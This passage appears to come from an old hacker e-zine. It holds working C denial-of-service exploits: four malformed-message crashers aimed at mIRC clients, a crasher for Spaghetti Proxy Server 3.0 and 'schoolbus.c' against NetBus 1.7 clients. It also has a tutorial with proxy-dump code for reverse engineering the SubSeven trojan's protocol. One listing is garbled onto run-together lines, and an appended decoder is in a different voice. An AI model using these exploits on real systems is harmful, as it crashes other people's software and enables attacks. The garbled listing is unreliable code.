   if ((ls = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == INVALID_SOCKET)
      die("Unable to create socket.");

   c = select_sploit();
   listen_sock(ls, LISTEN_PORT);
   printf("Waiting for connection on port %d...\n", LISTEN_PORT);
   ls = poll_for_connect(ls);   // From here on ls is the accepted client connection.

   switch (c) {
      case 0 : exploit1(ls); break;
      case 1 : exploit2(ls); break;
      case 2 : exploit3(ls); break;
      case 3 : exploit4(ls);
   }

   closesocket(ls);
   return 0;
}

void listen_sock(int sock, int port)
{
   struct sockaddr_in addr;

   memset(&addr, 0, sizeof(addr));
   addr.sin_family = AF_INET;
   addr.sin_addr.s_addr = INADDR_ANY;
   addr.sin_port = htons(port);
   if (bind(sock, (struct sockaddr *)&addr, sizeof(addr)) == -1)
      die("Error binding socket.");
   if (listen(sock, 20) == -1)
      die("Error listening.");
}

void die(char *message)
{
   printf("Fatal error: %s\n", message);
   exit(1);
}

int poll_for_connect(int listensock)
{
   struct sockaddr_in peer;
   int sendsock;
   int szpeer = sizeof(peer);

   do {
      sendsock = accept(listensock, (struct sockaddr *)&peer, &szpeer);
   } while (sendsock == -1);
   printf("Connection from [%s].\n", inet_ntoa(peer.sin_addr));
   return sendsock;
}

#define last_select 3

int select_sploit(void)
{
   int k;

   printf("Select exploit:\n0 - incomplete nick change.\n");
   printf("1 - msg with loads of parameters.\n2 - incomplete mode change.\n");
   printf("3 - incomplete kick.\n");
   k = getch();
   // Accept a single digit in the range 0..last_select only.
   if (k < '0' || k > '9' || (k - '0') > last_select) {
      printf("Invalid selection.\n");
      exit(1);
   }
   return k - '0';
}
/* Exploit 1: incomplete nick change

   mIRC 5.7 and past versions seem to suffer from bugs involving incomplete
   messages. I previously e-mailed Khaled M. Bey about one such bug, and it's
   fixed in this version, but there are other similar (almost identical) bugs
   still in v5.7. This attack is executed from the _server_ side. All we need
   to do is send the client a half complete nick change message, ie
   ":!ident@host.com NICK". We must put the target's current nick name where
   is. */

#define END_NICK "!ident@host.com NICK\x0a"

void exploit1(int s)
{
   char sod[256];

   memset(sod, '\0', 256);
   sod[0] = ':';
   strcat(sod, TARGET_NICK);
   strcat(sod, END_NICK);
   send(s, sod, 256, 0);
   Sleep(1000); // Make sure the packet gets there.
}

/* Exploit 2: server message overflow

   If the client sends a large message with too many parameters, it crashes,
   and part of the buffer is stuffed into EAX. */

#define MSG_LEN 1000 // This must be an even number.

void exploit2(int s)
{
   char sod[MSG_LEN];
   int c = 0;

   do {
      sod[c] = (char)0xff;
      sod[c + 1] = ' ';
      c += 2;
   } while (c < MSG_LEN);
   send(s, sod, MSG_LEN, 0);
   Sleep(1000); // Make sure the packet gets there.
}

/* Exploit 3: incomplete mode change

   This is basically the same as the nick change exploit. */

#define END_MODE "!ident@host.com MODE\x0a"

void exploit3(int s)
{
   char sod[256];

   memset(sod, '\0', 256);
   sod[0] = ':';
   strcat(sod, TARGET_NICK);
   strcat(sod, END_MODE);
   send(s, sod, 256, 0);
   Sleep(1000); // Make sure the packet gets there.
}

/* Exploit 4: incomplete kick

   Another incomplete message bug. */

#define JOIN " JOIN #\x0a"
#define KICK ": KICK #\x0a"

void exploit4(int s)
{
   char sod[256];

   memset(sod, '\0', 256);
   sod[0] = ':';
   strcat(sod, TARGET_NICK);
   strcat(sod, JOIN);
   printf("%s%s", sod, KICK);
   send(s, sod, strlen(sod), 0);
   send(s, KICK, strlen(KICK), 0);
   Sleep(1000); // Make sure the packet gets there.
}

@HWA

260.0 Spaghetti proxy server exploit code
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

/* sps3.c - Spaghetti Proxy Server 3.0 DoS attack
   (c) Chopsui-cide/MmM '00
   The Mad Midget Mafia - http://midgets.box.sk/

   Spaghetti Proxy Server claims to offer "complete security". In reality, it
   does the exact opposite. As well as being vulnerable to a rather simple
   bug, it stores your RAS username and password in plaintext in the registry
   keys:

      HKEY_LOCAL_MACHINE\SOFTWARE\aVirt\Gateway Home\3.0\RAS\RASPassword
   and
      HKEY_LOCAL_MACHINE\SOFTWARE\aVirt\Gateway Home\3.0\RAS\RASUserName

   This simple program will cause SPS to crash. It does not appear as though
   arbitrary code could be executed using this vulnerability.

   Usage: sps3
*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <winsock.h>

#define PORT 38126
#define LEN 33

void fatal_error(char *message);
int connect_sock(int sock, char *host, int port);

int main(int argc, char *argv[])
{
   WSADATA wsaData;
   WORD wVersionRequested;
   int sock;
   char str[LEN];

   if (argc < 2) {
      printf("Usage: sps3 \n");
      exit(0);
   }

   wVersionRequested = MAKEWORD(1, 1);
   if (WSAStartup(wVersionRequested, &wsaData) < 0)
      fatal_error("Unable to initialise Winsock.");
   if ((sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == INVALID_SOCKET)
      fatal_error("Unable to create socket.");

   connect_sock(sock, argv[1], PORT);
   memset(str, 'X', LEN);          // LEN bytes of filler is all it takes.
   send(sock, str, LEN, 0);
   Sleep(5000); // This may obviously have to be increased.
   closesocket(sock);
   printf("Done\n");
   return 0;
}

int connect_sock(int sock, char *host, int port)
{
   struct sockaddr_in addr;
   struct hostent *he;

   memset(&addr, 0, sizeof(addr));
   addr.sin_family = AF_INET;
   addr.sin_port = htons(port);
   // Try a host name first, then fall back to dotted-quad notation.
   if ((he = gethostbyname(host)) != NULL)
      memcpy((char *)&addr.sin_addr, he->h_addr, he->h_length);
   else if ((addr.sin_addr.s_addr = inet_addr(host)) == INADDR_NONE)
      fatal_error("Invalid host.");
   if (connect(sock, (struct sockaddr *)&addr, sizeof(addr)) == -1)
      fatal_error("Error connecting.");
   printf("Connected to %s:%d\n", host, port);
   return 0;
}

void fatal_error(char *message)
{
   printf("Fatal error: %s\n", message);
   exit(1);
}

@HWA

261.0 schoolbus.c - netbus 1.7 client exploit crashes script kids box
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

/* schoolbus.c - Remote DoS exploit for NetBus 1.7 client
   (c) -Chopsui-cide/[M-m-M]- 1999
   The Mad Midget Mafia [M-m-M] - http://underground2.4mg.com/

   A nice anti-lamer device - freezes NetBus 1.7, sometimes taking the rest
   of the system with it (on slow systems).
*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <conio.h>
#include <winsock.h>

#define CRASHLEN 80000

char *ver = "NetBus 1.7";
char *message = "Message; Uh oh! You've been screwed, you talentless script kiddie.";
char cr[] = {0, 13};

void listen_sock(int sock, int port);      // Starts the socket listening
void die(char *message);                   // Fatal error
int poll_for_connect(int listensock);      // Wait for connect
void bye_bye_script_kiddie(int sock);      // Sends the crash :)

int main(int argc, char *argv[])
{
   WSADATA wsaData;
   WORD wVersionRequested;
   int listensock;
   int sendsock;

   if (argc < 2) {
      puts("Usage: schoolbus ");
      exit(0);
   }

   wVersionRequested = MAKEWORD(1, 1);
   if (WSAStartup(wVersionRequested, &wsaData) < 0)
      die("Unable to initialise Winsock.");
   if ((listensock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == INVALID_SOCKET)
      die("Unable to create socket.");

   listen_sock(listensock, atoi(argv[1]));
   do {
      puts("Listening...");
      sendsock = poll_for_connect(listensock);
      bye_bye_script_kiddie(sendsock);
      closesocket(sendsock);
   } while (!kbhit());
   getch();
   closesocket(listensock);
   return 0;
}

void listen_sock(int sock, int port)
{
   struct sockaddr_in addr;

   memset(&addr, 0, sizeof(addr));
   addr.sin_family = AF_INET;
   addr.sin_addr.s_addr = INADDR_ANY;
   addr.sin_port = htons(port);
   if (bind(sock, (struct sockaddr *)&addr, sizeof(addr)) == -1)
      die("Error binding socket.");
   if (listen(sock, 20) == -1)
      die("Error listening.");
}

void die(char *message)
{
   printf("Fatal error: %s\n", message);
   exit(1);
}

int poll_for_connect(int listensock)
{
   struct sockaddr_in peer;
   int sendsock;
   int szpeer = sizeof(peer);

   do {
      sendsock = accept(listensock, (struct sockaddr *)&peer, &szpeer);
   } while (sendsock == -1);
   printf("Connection from [%s].\n", inet_ntoa(peer.sin_addr));
   return sendsock;
}

void bye_bye_script_kiddie(int sock)
{
   char tmp[CRASHLEN];

   puts("Crashing...");
   memset(tmp, 'X', CRASHLEN);                     // CRASHLEN bytes of filler.
   if (send(sock, ver, strlen(ver), 0) == -1) die("Send error.");
   if (send(sock, cr, 2, 0) == -1) die("Send error.");
   if
   (send(sock, message, strlen(message), 0) == -1) die("Send error.");  // Send our bye bye
                                                                         // message.
   if (send(sock, cr, 2, 0) == -1) die("Send error.");
   Sleep(1000);  // Wait a second so they see the message, then....
   if (send(sock, "Message; ", 9, 0) == -1) die("Send error.");         // Teach them a lesson :)
   if (send(sock, tmp, CRASHLEN, 0) == -1) die("Send error.");
   if (send(sock, cr, 2, 0) == -1) die("Send error.");
   Sleep(3000);  // Make sure all the data got sent (may need adjustment).
   printf("Send complete: another one bites the dust!\n\n");
}

@HWA

262.0 Protocol reverse engineering using Sub7 as an example
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Reverse engineering protocols by example
Chopsui-cide[MmM] 2000
The Mad Midget Mafia - http://midgets.box.sk/
E-mail: chopsuicide@mail.box.sk
=============================================================================

Introduction:
===============

The skills taught in this text can be used for a variety of purposes such as open sourcing programs and documenting protocols. It is a newbie text, so don't expect anything too exciting. As our example, we will examine _some_ of the SubSeven protocol, and write some code to implement some of it (in C). It should be noted that this was written on and for Windows, but should be applicable to the Unix environment as well (to some degree).

Examining the protocol
==========================

Throughout this tutorial, we will examine the SubSeven 2.1 Gold protocol. First, we will need to obtain a dump of some of the protocol. For this we will use the following C source:

//------------------------------- *snip* -------------------------------
// dumpprot.c

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <conio.h>
#include <winsock.h>

// This program acts like a proxy. It dumps all traffic to stdout.
#define LOOP_BACK "127.0.0.1"
#define LIS_PORT 2000
#define CON_PORT 27374
#define MAX_PACKET_SIZE 2048

void fatal_error(char *msg);
void bnd_n_lsn(int sock, int port);
int connect_sock(int sock, char *host, int port);
void server_side_thread(void *param);
void client_side_thread(void *param);

int ss, cs, ls; // Server socket, client socket, listen socket.

int main(void)
{
   WSADATA data;
   WORD ver;
   DWORD thid;                 // CreateThread writes a DWORD here.
   HANDLE h;
   struct sockaddr_in peer;
   int szpeer;

   ver = MAKEWORD(1, 1);
   if (WSAStartup(ver, &data) < 0)
      fatal_error("Unable to initialise Winsock.");
   if ((ss = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0)
      fatal_error("Could not create socket.");
   if ((cs = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0)
      fatal_error("Could not create socket.");
   if ((ls = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0)
      fatal_error("Could not create socket.");

   // Wait for connect from client.
   printf("Waiting for connection...");
   bnd_n_lsn(ls, LIS_PORT);
   szpeer = sizeof(peer);
   do {
      cs = accept(ls, (struct sockaddr *)&peer, &szpeer);
   } while (cs == -1);
   printf("accepted from [%s].\n", inet_ntoa(peer.sin_addr));
   closesocket(ls); // We won't be needing this...

   // Now, connect the server socket.
   printf("Connecting to [%s]...", LOOP_BACK);
   if (connect_sock(ss, LOOP_BACK, CON_PORT) == -1)
      fatal_error("Could not connect to the Sub7 server.");

   // We can now begin relaying.
   printf("\nLinked: [%s]<->[%s]\n", inet_ntoa(peer.sin_addr), LOOP_BACK);

   // Start threads and wait for a key to be pressed.
   h = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)client_side_thread,
                    (LPVOID)0, 0, &thid);
   SetThreadPriority(h, THREAD_PRIORITY_BELOW_NORMAL);
   h = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)server_side_thread,
                    (LPVOID)0, 0, &thid);
   SetThreadPriority(h, THREAD_PRIORITY_BELOW_NORMAL);
   getch();

   // Clean up a bit.
   closesocket(ss);
   closesocket(cs);
   return 0; // Exit
}

void fatal_error(char *msg)
{
   printf("Fatal error: %s\n", msg);
   exit(1);
}

void bnd_n_lsn(int sock, int port) // Bind and listen socket
{
   struct sockaddr_in addr;

   memset(&addr, 0, sizeof(addr));
   addr.sin_family = AF_INET;
   addr.sin_addr.s_addr = INADDR_ANY;
   addr.sin_port = htons(port);
   if (bind(sock, (struct sockaddr *)&addr, sizeof(addr)) == -1)
      fatal_error("Error binding socket.");
   if (listen(sock, 20) == -1)
      fatal_error("Error listening.");
}

int connect_sock(int sock, char *host, int port)
{
   struct sockaddr_in addr;
   struct hostent *he;

   memset(&addr, 0, sizeof(addr));
   addr.sin_family = AF_INET;
   addr.sin_port = htons(port);
   // Try a host name first, then fall back to dotted-quad notation.
   if ((he = gethostbyname(host)) != NULL)
      memcpy((char *)&addr.sin_addr, he->h_addr, he->h_length);
   else if ((addr.sin_addr.s_addr = inet_addr(host)) == INADDR_NONE)
      fatal_error("Invalid host.");
   if (connect(sock, (struct sockaddr *)&addr, sizeof(addr)) == -1)
      return -1;
   return 0;
}

void server_side_thread(void *param)
{
   char buf[MAX_PACKET_SIZE];
   int r;

   do {
      memset(buf, 0, MAX_PACKET_SIZE);
      r = recv(ss, buf, MAX_PACKET_SIZE - 1, 0);   // Leave room for the terminator.
      if (r > 0) {
         printf("Server: [%s]\n", buf);
         send(cs, buf, r, 0); // Forward to client socket
      }
   } while (r > 0);   // 0 = peer closed the connection, -1 = error.
   printf("Server socket died.\n");
   exit(0);
}

void client_side_thread(void *param)
{
   char buf[MAX_PACKET_SIZE];
   int r;

   do {
      memset(buf, 0, MAX_PACKET_SIZE);
      r = recv(cs, buf, MAX_PACKET_SIZE - 1, 0);   // Leave room for the terminator.
      if (r > 0) {
         printf("Client: [%s]\n", buf);
         send(ss, buf, r, 0); // Forward to server socket
      }
   } while (r > 0);   // 0 = peer closed the connection, -1 = error.
   printf("Client socket died.\n");
   exit(0);
}
//------------------------------- *snip* -------------------------------

Configure your Sub7 server to listen to port 27374, and set the password to "hello". Run it.
For God's sake make sure you are either NOT connected to any IP networks, or configure your firewall to block any traffic to port 27374 from anything but your system's loop-back address. Compile and run dumpprot.c. Connect to port 2000 with the Sub7 client. Now, do the following, and _only_ the following (your dump of the protocol should be the same as the one shown here).

 1) Enter the password ("hello").
 2) Select "keys/messages".
 3) Click on "msg manager".
 4) Select "Warning" as the icon.
 5) Select "Yes, no, cancel" as the buttons.
 6) Enter "title" as the message title.
 7) Enter "text" as the message text.
 8) Click on "send message".
 9) Respond by clicking on "yes".
10) Repeat steps 8 and 9, but this time select "no".
11) Change the icon to "error".
12) Send the message (select "yes").
13) Change the button to "OK".
14) Send the message.
15) Exit dumpprot.

Your results should look like this:

[snip]
Waiting for connection...accepted from [127.0.0.1].
Connecting to [127.0.0.1]...
Linked: [127.0.0.1]<->[127.0.0.1]
Server: [PWD]
Client: [PWDhello]
Server: [connected. 19:54.08 - April 5, 2000, Wednesday, version: GOLD 2.1]
Client: [MW:51titleZJXXtext]
Server: [user clicked : Yes.]
Client: [MW:51titleZJXXtext]
Server: [user clicked : No.]
Client: [MW:53titleZJXXtext]
Server: [user clicked : Yes.]
Client: [MW:03titleZJXXtext]
Server: [user clicked : Ok.]
[snip]

Let's break this down a little:

[snip]
Server: [PWD]
// This is obviously the server telling the client that it can't connect until the correct password is sent.
//
Client: [PWDhello]
// Here, the client sends back the correct password.
//
Server: [connected. 19:54.08 - April 5, 2000, Wednesday, version: GOLD 2.1]
// The client now knows that it has connected, and the server is ready to accept commands.
//
// This next part will need to be looked at carefully. Pay attention to the two characters after the colon in each client request:
Client: [MW:51titleZJXXtext]
// "Yes, No, Cancel" button, "warning" icon.
//
Server: [user clicked : Yes.]
// Self explanatory. This is shoved straight into the status bar at the bottom of the client window.
//
Client: [MW:51titleZJXXtext]
// "Yes, No, Cancel" button, "warning" icon.
//
Server: [user clicked : No.]
Client: [MW:53titleZJXXtext]
// "Yes, No, Cancel" button, "error" icon. The 1 has changed to a 3. Let's not make assumptions yet...
//
Server: [user clicked : Yes.]
Client: [MW:03titleZJXXtext]
// "OK" button, "error" icon. The 5 has changed to 0. It's fairly safe to assume that the first character represents which button combo, and the second the icon.
//
Server: [user clicked : Ok.]
// Surprise, surprise.
//
[snip]

Now we'll break down the structure of all messages a bit more. Make sure you save the dump of the protocol somewhere for later (you might need it). From what we have seen thus far most of this protocol uses regular alphanumeric characters. To see if there are any terminating characters to divide messages we will need to obtain a hex dump of a few messages. Here's the modified version of dumpprot.c that will do what we want (keep the old one):

//------------------------------- *snip* -------------------------------
// dumphex.c

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <conio.h>
#include <winsock.h>

// This program acts like a proxy. It dumps all traffic to stdout as hex.

#define LOOP_BACK "127.0.0.1"
#define LIS_PORT 2000
#define CON_PORT 27374
#define MAX_PACKET_SIZE 2048

void fatal_error(char *msg);
void bnd_n_lsn(int sock, int port);
int connect_sock(int sock, char *host, int port);
void server_side_thread(void *param);
void client_side_thread(void *param);

int ss, cs, ls; // Server socket, client socket, listen socket.
void main() { WSADATA data; WORD ver; WORD thid; HANDLE h; struct sockaddr_in peer; int szpeer; ver = MAKEWORD(1, 1); if (WSAStartup(ver, &data) < 0) fatal_error("Unable to initialise Winsock."); if ((ss = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0) fatal_error("Could not create socket."); if ((cs = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0) fatal_error("Could not create socket."); if ((ls = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0) fatal_error("Could not create socket."); // Wait for connect from client. printf("Waiting for connection..."); bnd_n_lsn(ls, LIS_PORT); szpeer = sizeof(peer); do { cs = accept(ls, (struct sockaddr *)&peer, &szpeer); } while(cs == -1); printf("accepted from [%s].\n", inet_ntoa(peer.sin_addr)); closesocket(ls); // We won't be needing this... // Now, connect the server socket. printf("Connecting to [%s]...", LOOP_BACK); connect_sock(ss, LOOP_BACK, CON_PORT); // We can now begin relaying. printf("\nLinked: [%s]<->[%s]\n", inet_ntoa(peer.sin_addr), LOOP_BACK); // Start threads and wait for a key to be pressed. h = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)client_side_thread, (LPVOID)0, 0, (LPDWORD)&thid); SetThreadPriority(h, THREAD_PRIORITY_BELOW_NORMAL); h = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)server_side_thread, (LPVOID)0, 0, (LPDWORD)&thid); SetThreadPriority(h, THREAD_PRIORITY_BELOW_NORMAL); getch(); // Clean up a bit. 
closesocket(ss); closesocket(cs); return; // Exit } void fatal_error(char *msg) { printf("Fatal error: %s\n", msg); exit(1); } void bnd_n_lsn(int sock, int port) // Bind and list socket { struct sockaddr_in addr; int c = 0; memset((char *)&addr,'0', sizeof(addr)); addr.sin_family = AF_INET; addr.sin_addr.s_addr = INADDR_ANY; addr.sin_port = htons(port); if (bind(sock, &addr, sizeof(addr)) == -1) fatal_error("Error binding socket."); if (listen(sock, 20) == -1) fatal_error("Error listening."); } int connect_sock(int sock, char *host, int port) { struct sockaddr_in addr; struct hostent *he; memset(&addr, '0', sizeof(addr)); addr.sin_family = AF_INET; addr.sin_addr.s_addr = inet_addr(host); addr.sin_port = htons(port); if ((he = gethostbyname(host)) != NULL) memcpy((char *)&addr.sin_addr, he->h_addr, he->h_length); else if ((addr.sin_addr.s_addr = inet_addr(host)) == -1) fatal_error("Invalid host."); if (connect(sock, (struct sockaddr_in *)&addr, 16) == -1) return -1; return 0; } void server_side_thread(void *param) { char buf[MAX_PACKET_SIZE]; int r, c; do { memset((char *)&buf, 0, MAX_PACKET_SIZE); r = recv(ss, (char *)&buf, MAX_PACKET_SIZE, 0); if (r > 0) { c = 0; printf("Server: ["); do { printf("%x ", buf[c]); c++; } while(c < r); printf("]\n", buf); send(cs, (char *)&buf, r, 0); // Forward to server socket } } while(r != -1); printf("Server socket died.\n"); exit(0); } void client_side_thread(void *param) { char buf[MAX_PACKET_SIZE]; int r, c; do { memset((char *)&buf, 0, MAX_PACKET_SIZE); r = recv(cs, (char *)&buf, MAX_PACKET_SIZE, 0); if (r > 0) { c = 0; printf("Client: ["); do { printf("%x ", buf[c]); c++; } while(c < r); printf("]\n", buf); send(ss, (char *)&buf, r, 0); // Forward to server socket } } while(r != -1); printf("Client socket died.\n"); exit(0); } //------------------------------- *snip* ------------------------------- Recompile, run, and connect like before. This time though, don't do anything but connect (we only need a few messages). 
The output should look something like this:

[snip]
Waiting for connection...accepted from [127.0.0.1].
Connecting to [127.0.0.1]...
Linked: [127.0.0.1]<->[127.0.0.1]
Server: [50 57 44 ]
Client: [50 57 44 68 65 6c 6c 6f ]
Server: [63 6f 6e 6e 65 63 74 65 64 2e 20 32 30 3a 32 32 2e 30 34 20 2d 20 41 70 72 69 6c 20 35 2c 20 32 30 30 30 2c 20 57 65 64 6e 65 73 64 61 79 2c 20 76 65 72 73 69 6f 6e 3a 20 47 4f 4c 44 20 32 2e 31 ]
[snip]

It looks as though there are no terminating characters, so the messages must be differentiated by what packets they arrive in. Let's take a look at the message box message again:

MW:51titleZJXXtext

The format is probably: MW:
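As an added example (my code, not part of the article or of Sub7 itself), here is a small C decoder for the message-box command as it appears in the dump above, the kind of thing you would run over a saved proxy capture when reviewing what a client actually sent. It assumes the layout the observations suggest: "MW:", one button digit, one icon digit, the title, the literal "ZJXX" separator and the text, with the packet boundary as the message boundary since there is no terminator; the field size limit and the sample packets are constructed for the demonstration.

```c
#include <stdio.h>
#include <string.h>
#define MW_MAX_FIELD 256 /* assumed limit; the article gives no maximum */

typedef struct {
    int button;               /* digit after "MW:": 5 = Yes/No/Cancel, 0 = OK in the dump */
    int icon;                 /* second digit: 1 = warning, 3 = error in the dump */
    char title[MW_MAX_FIELD];
    char text[MW_MAX_FIELD];
} mw_msg;

/* Decode one captured client packet of len bytes (no terminator, so the
 * packet boundary is the message boundary). Returns 1 on success, 0 if the
 * bytes are not a well-formed MW message: wrong prefix, non-digit codes,
 * missing ZJXX separator, or a field that would not fit. */
int parse_mw(const unsigned char *pkt, size_t len, mw_msg *out)
{
    size_t i, tstart = 5, tlen, xlen;
    if (len < 5 || memcmp(pkt, "MW:", 3) != 0) return 0;
    if (pkt[3] < '0' || pkt[3] > '9' || pkt[4] < '0' || pkt[4] > '9') return 0;
    out->button = pkt[3] - '0';
    out->icon = pkt[4] - '0';
    /* The first "ZJXX" after the codes ends the title (a title containing
     * "ZJXX" itself would be cut short; that is a property of the format). */
    for (i = tstart; i + 4 <= len; i++)
        if (memcmp(pkt + i, "ZJXX", 4) == 0) break;
    if (i + 4 > len) return 0;
    tlen = i - tstart;
    xlen = len - (i + 4);
    if (tlen >= MW_MAX_FIELD || xlen >= MW_MAX_FIELD) return 0;
    memcpy(out->title, pkt + tstart, tlen); out->title[tlen] = '\0';
    memcpy(out->text, pkt + i + 4, xlen);  out->text[xlen] = '\0';
    return 1;
}

int main(void)
{
    /* Constructed samples: the client packets from the dump above plus the
     * password packet, which must be rejected as not an MW message. */
    const char *pkts[] = { "MW:51titleZJXXtext", "MW:53titleZJXXtext",
                           "MW:03titleZJXXtext", "PWDhello" };
    size_t n;
    for (n = 0; n < sizeof(pkts) / sizeof(pkts[0]); n++) {
        mw_msg m;
        if (parse_mw((const unsigned char *)pkts[n], strlen(pkts[n]), &m))
            printf("button=%d icon=%d title=\"%s\" text=\"%s\"\n",
                   m.button, m.icon, m.title, m.text);
        else
            printf("not an MW message: [%s]\n", pkts[n]);
    }
    return 0;
}
```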